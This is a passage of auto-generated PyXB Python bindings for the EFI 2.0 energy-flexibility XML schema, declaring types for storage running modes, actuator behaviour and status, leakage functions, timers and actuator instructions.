__heatThermalPower = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatThermalPower'), 'heatThermalPower', '__httpwww_flexiblepower_orgefi_2_StorageContinuousRunningModeData_httpwww_flexiblepower_orgefi_2heatThermalPower', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 614, 3), )
heatThermalPower = property(__heatThermalPower.value, __heatThermalPower.set, None, None)
_ElementMap.update({
__fillingRate.name() : __fillingRate,
__runningCost.name() : __runningCost,
__electricalPower.name() : __electricalPower,
__gasFlowRate.name() : __gasFlowRate,
__heatTemperature.name() : __heatTemperature,
__heatFlowRate.name() : __heatFlowRate,
__heatThermalPower.name() : __heatThermalPower
})
_AttributeMap.update({
})
_module_typeBindings.StorageContinuousRunningModeData = StorageContinuousRunningModeData
Namespace.addCategoryObject('typeBinding', 'StorageContinuousRunningModeData', StorageContinuousRunningModeData)
# Complex type {http://www.flexiblepower.org/efi-2}StorageRunningModes with content type ELEMENT_ONLY
class StorageRunningModes (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}StorageRunningModes with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'StorageRunningModes')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 649, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}discreteRunningMode uses Python identifier discreteRunningMode
__discreteRunningMode = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'discreteRunningMode'), 'discreteRunningMode', '__httpwww_flexiblepower_orgefi_2_StorageRunningModes_httpwww_flexiblepower_orgefi_2discreteRunningMode', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 652, 4), )
discreteRunningMode = property(__discreteRunningMode.value, __discreteRunningMode.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}continuousRunningMode uses Python identifier continuousRunningMode
__continuousRunningMode = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'continuousRunningMode'), 'continuousRunningMode', '__httpwww_flexiblepower_orgefi_2_StorageRunningModes_httpwww_flexiblepower_orgefi_2continuousRunningMode', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 653, 4), )
continuousRunningMode = property(__continuousRunningMode.value, __continuousRunningMode.set, None, None)
_ElementMap.update({
__discreteRunningMode.name() : __discreteRunningMode,
__continuousRunningMode.name() : __continuousRunningMode
})
_AttributeMap.update({
})
_module_typeBindings.StorageRunningModes = StorageRunningModes
Namespace.addCategoryObject('typeBinding', 'StorageRunningModes', StorageRunningModes)
# Complex type {http://www.flexiblepower.org/efi-2}ActuatorBehaviour with content type ELEMENT_ONLY
class ActuatorBehaviour (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}ActuatorBehaviour with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ActuatorBehaviour')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 657, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}runningModes uses Python identifier runningModes
__runningModes = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningModes'), 'runningModes', '__httpwww_flexiblepower_orgefi_2_ActuatorBehaviour_httpwww_flexiblepower_orgefi_2runningModes', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 659, 3), )
runningModes = property(__runningModes.value, __runningModes.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}timers uses Python identifier timers
__timers = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'timers'), 'timers', '__httpwww_flexiblepower_orgefi_2_ActuatorBehaviour_httpwww_flexiblepower_orgefi_2timers', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 660, 3), )
timers = property(__timers.value, __timers.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}transitions uses Python identifier transitions
__transitions = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'transitions'), 'transitions', '__httpwww_flexiblepower_orgefi_2_ActuatorBehaviour_httpwww_flexiblepower_orgefi_2transitions', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 661, 3), )
transitions = property(__transitions.value, __transitions.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}actuatorId uses Python identifier actuatorId
__actuatorId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'actuatorId'), 'actuatorId', '__httpwww_flexiblepower_orgefi_2_ActuatorBehaviour_httpwww_flexiblepower_orgefi_2actuatorId', pyxb.binding.datatypes.int, required=True)
__actuatorId._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 663, 2)
__actuatorId._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 663, 2)
actuatorId = property(__actuatorId.value, __actuatorId.set, None, None)
_ElementMap.update({
__runningModes.name() : __runningModes,
__timers.name() : __timers,
__transitions.name() : __transitions
})
_AttributeMap.update({
__actuatorId.name() : __actuatorId
})
_module_typeBindings.ActuatorBehaviour = ActuatorBehaviour
Namespace.addCategoryObject('typeBinding', 'ActuatorBehaviour', ActuatorBehaviour)
# Complex type {http://www.flexiblepower.org/efi-2}LeakageElement with content type EMPTY
class LeakageElement (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}LeakageElement with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'LeakageElement')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 665, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute {http://www.flexiblepower.org/efi-2}fillLevelLowerBound uses Python identifier fillLevelLowerBound
__fillLevelLowerBound = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'fillLevelLowerBound'), 'fillLevelLowerBound', '__httpwww_flexiblepower_orgefi_2_LeakageElement_httpwww_flexiblepower_orgefi_2fillLevelLowerBound', pyxb.binding.datatypes.double, required=True)
__fillLevelLowerBound._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 666, 2)
__fillLevelLowerBound._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 666, 2)
fillLevelLowerBound = property(__fillLevelLowerBound.value, __fillLevelLowerBound.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}fillLevelUpperBound uses Python identifier fillLevelUpperBound
__fillLevelUpperBound = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'fillLevelUpperBound'), 'fillLevelUpperBound', '__httpwww_flexiblepower_orgefi_2_LeakageElement_httpwww_flexiblepower_orgefi_2fillLevelUpperBound', pyxb.binding.datatypes.double, required=True)
__fillLevelUpperBound._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 667, 2)
__fillLevelUpperBound._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 667, 2)
fillLevelUpperBound = property(__fillLevelUpperBound.value, __fillLevelUpperBound.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}leakageRate uses Python identifier leakageRate
__leakageRate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'leakageRate'), 'leakageRate', '__httpwww_flexiblepower_orgefi_2_LeakageElement_httpwww_flexiblepower_orgefi_2leakageRate', pyxb.binding.datatypes.double, required=True)
__leakageRate._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 668, 2)
__leakageRate._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 668, 2)
leakageRate = property(__leakageRate.value, __leakageRate.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__fillLevelLowerBound.name() : __fillLevelLowerBound,
__fillLevelUpperBound.name() : __fillLevelUpperBound,
__leakageRate.name() : __leakageRate
})
_module_typeBindings.LeakageElement = LeakageElement
Namespace.addCategoryObject('typeBinding', 'LeakageElement', LeakageElement)
# Complex type {http://www.flexiblepower.org/efi-2}LeakageFunction with content type ELEMENT_ONLY
class LeakageFunction (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}LeakageFunction with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'LeakageFunction')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 670, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}leakageElement uses Python identifier leakageElement
__leakageElement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'leakageElement'), 'leakageElement', '__httpwww_flexiblepower_orgefi_2_LeakageFunction_httpwww_flexiblepower_orgefi_2leakageElement', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 672, 3), )
leakageElement = property(__leakageElement.value, __leakageElement.set, None, None)
_ElementMap.update({
__leakageElement.name() : __leakageElement
})
_AttributeMap.update({
})
_module_typeBindings.LeakageFunction = LeakageFunction
Namespace.addCategoryObject('typeBinding', 'LeakageFunction', LeakageFunction)
# Complex type {http://www.flexiblepower.org/efi-2}ActuatorBehaviours with content type ELEMENT_ONLY
class ActuatorBehaviours (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}ActuatorBehaviours with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ActuatorBehaviours')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 675, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}actuatorBehaviour uses Python identifier actuatorBehaviour
__actuatorBehaviour = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'actuatorBehaviour'), 'actuatorBehaviour', '__httpwww_flexiblepower_orgefi_2_ActuatorBehaviours_httpwww_flexiblepower_orgefi_2actuatorBehaviour', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 677, 3), )
actuatorBehaviour = property(__actuatorBehaviour.value, __actuatorBehaviour.set, None, None)
_ElementMap.update({
__actuatorBehaviour.name() : __actuatorBehaviour
})
_AttributeMap.update({
})
_module_typeBindings.ActuatorBehaviours = ActuatorBehaviours
Namespace.addCategoryObject('typeBinding', 'ActuatorBehaviours', ActuatorBehaviours)
# Complex type {http://www.flexiblepower.org/efi-2}TimerUpdate with content type ELEMENT_ONLY
class TimerUpdate (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}TimerUpdate with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'TimerUpdate')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 697, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}finishedAt uses Python identifier finishedAt
__finishedAt = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'finishedAt'), 'finishedAt', '__httpwww_flexiblepower_orgefi_2_TimerUpdate_httpwww_flexiblepower_orgefi_2finishedAt', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 699, 3), )
finishedAt = property(__finishedAt.value, __finishedAt.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}timerId uses Python identifier timerId
__timerId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'timerId'), 'timerId', '__httpwww_flexiblepower_orgefi_2_TimerUpdate_httpwww_flexiblepower_orgefi_2timerId', pyxb.binding.datatypes.int, required=True)
__timerId._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 701, 2)
__timerId._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 701, 2)
timerId = property(__timerId.value, __timerId.set, None, None)
_ElementMap.update({
__finishedAt.name() : __finishedAt
})
_AttributeMap.update({
__timerId.name() : __timerId
})
_module_typeBindings.TimerUpdate = TimerUpdate
Namespace.addCategoryObject('typeBinding', 'TimerUpdate', TimerUpdate)
# Complex type {http://www.flexiblepower.org/efi-2}TimerUpdates with content type ELEMENT_ONLY
class TimerUpdates (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}TimerUpdates with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'TimerUpdates')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 703, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}timerUpdate uses Python identifier timerUpdate
__timerUpdate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'timerUpdate'), 'timerUpdate', '__httpwww_flexiblepower_orgefi_2_TimerUpdates_httpwww_flexiblepower_orgefi_2timerUpdate', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 705, 3), )
timerUpdate = property(__timerUpdate.value, __timerUpdate.set, None, None)
_ElementMap.update({
__timerUpdate.name() : __timerUpdate
})
_AttributeMap.update({
})
_module_typeBindings.TimerUpdates = TimerUpdates
Namespace.addCategoryObject('typeBinding', 'TimerUpdates', TimerUpdates)
# Complex type {http://www.flexiblepower.org/efi-2}ActuatorStatus with content type ELEMENT_ONLY
class ActuatorStatus (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}ActuatorStatus with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ActuatorStatus')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 708, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}currentRunningMode uses Python identifier currentRunningMode
__currentRunningMode = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'currentRunningMode'), 'currentRunningMode', '__httpwww_flexiblepower_orgefi_2_ActuatorStatus_httpwww_flexiblepower_orgefi_2currentRunningMode', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 710, 3), )
currentRunningMode = property(__currentRunningMode.value, __currentRunningMode.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}runningModeFactor uses Python identifier runningModeFactor
__runningModeFactor = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor'), 'runningModeFactor', '__httpwww_flexiblepower_orgefi_2_ActuatorStatus_httpwww_flexiblepower_orgefi_2runningModeFactor', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 711, 3), )
runningModeFactor = property(__runningModeFactor.value, __runningModeFactor.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}previousRunningModeId uses Python identifier previousRunningModeId
__previousRunningModeId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'previousRunningModeId'), 'previousRunningModeId', '__httpwww_flexiblepower_orgefi_2_ActuatorStatus_httpwww_flexiblepower_orgefi_2previousRunningModeId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 719, 3), )
previousRunningModeId = property(__previousRunningModeId.value, __previousRunningModeId.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}transitionTimestamp uses Python identifier transitionTimestamp
__transitionTimestamp = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'transitionTimestamp'), 'transitionTimestamp', '__httpwww_flexiblepower_orgefi_2_ActuatorStatus_httpwww_flexiblepower_orgefi_2transitionTimestamp', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 720, 3), )
transitionTimestamp = property(__transitionTimestamp.value, __transitionTimestamp.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}timerUpdates uses Python identifier timerUpdates
__timerUpdates = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'timerUpdates'), 'timerUpdates', '__httpwww_flexiblepower_orgefi_2_ActuatorStatus_httpwww_flexiblepower_orgefi_2timerUpdates', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 721, 3), )
timerUpdates = property(__timerUpdates.value, __timerUpdates.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}actuatorId uses Python identifier actuatorId
__actuatorId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'actuatorId'), 'actuatorId', '__httpwww_flexiblepower_orgefi_2_ActuatorStatus_httpwww_flexiblepower_orgefi_2actuatorId', pyxb.binding.datatypes.int, required=True)
__actuatorId._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 723, 2)
__actuatorId._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 723, 2)
actuatorId = property(__actuatorId.value, __actuatorId.set, None, None)
_ElementMap.update({
__currentRunningMode.name() : __currentRunningMode,
__runningModeFactor.name() : __runningModeFactor,
__previousRunningModeId.name() : __previousRunningModeId,
__transitionTimestamp.name() : __transitionTimestamp,
__timerUpdates.name() : __timerUpdates
})
_AttributeMap.update({
__actuatorId.name() : __actuatorId
})
_module_typeBindings.ActuatorStatus = ActuatorStatus
Namespace.addCategoryObject('typeBinding', 'ActuatorStatus', ActuatorStatus)
# Complex type {http://www.flexiblepower.org/efi-2}ActuatorStatuses with content type ELEMENT_ONLY
class ActuatorStatuses (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}ActuatorStatuses with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ActuatorStatuses')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 725, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}actuatorStatus uses Python identifier actuatorStatus
__actuatorStatus = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'actuatorStatus'), 'actuatorStatus', '__httpwww_flexiblepower_orgefi_2_ActuatorStatuses_httpwww_flexiblepower_orgefi_2actuatorStatus', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 727, 3), )
actuatorStatus = property(__actuatorStatus.value, __actuatorStatus.set, None, None)
_ElementMap.update({
__actuatorStatus.name() : __actuatorStatus
})
_AttributeMap.update({
})
_module_typeBindings.ActuatorStatuses = ActuatorStatuses
Namespace.addCategoryObject('typeBinding', 'ActuatorStatuses', ActuatorStatuses)
# Complex type {http://www.flexiblepower.org/efi-2}TargetProfile with content type ELEMENT_ONLY
class TargetProfile (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}TargetProfile with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'TargetProfile')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 742, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}element uses Python identifier element
__element = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'element'), 'element', '__httpwww_flexiblepower_orgefi_2_TargetProfile_httpwww_flexiblepower_orgefi_2element', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 744, 3), )
element = property(__element.value, __element.set, None, None)
_ElementMap.update({
__element.name() : __element
})
_AttributeMap.update({
})
_module_typeBindings.TargetProfile = TargetProfile
Namespace.addCategoryObject('typeBinding', 'TargetProfile', TargetProfile)
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_10 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 745, 4)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute {http://www.flexiblepower.org/efi-2}duration uses Python identifier duration
__duration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_10_httpwww_flexiblepower_orgefi_2duration', pyxb.binding.datatypes.duration, required=True)
__duration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 746, 5)
__duration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 746, 5)
duration = property(__duration.value, __duration.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}fillLevelLowerBound uses Python identifier fillLevelLowerBound
__fillLevelLowerBound = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'fillLevelLowerBound'), 'fillLevelLowerBound', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_10_httpwww_flexiblepower_orgefi_2fillLevelLowerBound', pyxb.binding.datatypes.double, required=True)
__fillLevelLowerBound._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 747, 5)
__fillLevelLowerBound._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 747, 5)
fillLevelLowerBound = property(__fillLevelLowerBound.value, __fillLevelLowerBound.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}fillLevelUpperBound uses Python identifier fillLevelUpperBound
__fillLevelUpperBound = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'fillLevelUpperBound'), 'fillLevelUpperBound', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_10_httpwww_flexiblepower_orgefi_2fillLevelUpperBound', pyxb.binding.datatypes.double, required=True)
__fillLevelUpperBound._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 748, 5)
__fillLevelUpperBound._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 748, 5)
fillLevelUpperBound = property(__fillLevelUpperBound.value, __fillLevelUpperBound.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__duration.name() : __duration,
__fillLevelLowerBound.name() : __fillLevelLowerBound,
__fillLevelUpperBound.name() : __fillLevelUpperBound
})
_module_typeBindings.CTD_ANON_10 = CTD_ANON_10
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_11 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 770, 7)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}usageProfile uses Python identifier usageProfile
__usageProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'usageProfile'), 'usageProfile', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_11_httpwww_flexiblepower_orgefi_2usageProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 772, 9), )
usageProfile = property(__usageProfile.value, __usageProfile.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}usageProbabilityProfile uses Python identifier usageProbabilityProfile
__usageProbabilityProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'usageProbabilityProfile'), 'usageProbabilityProfile', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_11_httpwww_flexiblepower_orgefi_2usageProbabilityProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 773, 9), )
usageProbabilityProfile = property(__usageProbabilityProfile.value, __usageProbabilityProfile.set, None, None)
_ElementMap.update({
__usageProfile.name() : __usageProfile,
__usageProbabilityProfile.name() : __usageProbabilityProfile
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_11 = CTD_ANON_11
# Complex type {http://www.flexiblepower.org/efi-2}ActuatorInstruction with content type ELEMENT_ONLY
class ActuatorInstruction (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}ActuatorInstruction with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ActuatorInstruction')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 782, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}runningModeId uses Python identifier runningModeId
__runningModeId = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningModeId'), 'runningModeId', '__httpwww_flexiblepower_orgefi_2_ActuatorInstruction_httpwww_flexiblepower_orgefi_2runningModeId', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 784, 3), )
runningModeId = property(__runningModeId.value, __runningModeId.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}runningModeFactor uses Python identifier runningModeFactor
__runningModeFactor = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningModeFactor'), 'runningModeFactor', '__httpwww_flexiblepower_orgefi_2_ActuatorInstruction_httpwww_flexiblepower_orgefi_2runningModeFactor', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 785, 3), )
runningModeFactor = property(__runningModeFactor.value, __runningModeFactor.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}startTime uses Python identifier startTime
__startTime = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'startTime'), 'startTime', '__httpwww_flexiblepower_orgefi_2_ActuatorInstruction_httpwww_flexiblepower_orgefi_2startTime', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 793, 3), )
startTime = property(__startTime.value, __startTime.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}actuatorId uses Python identifier actuatorId
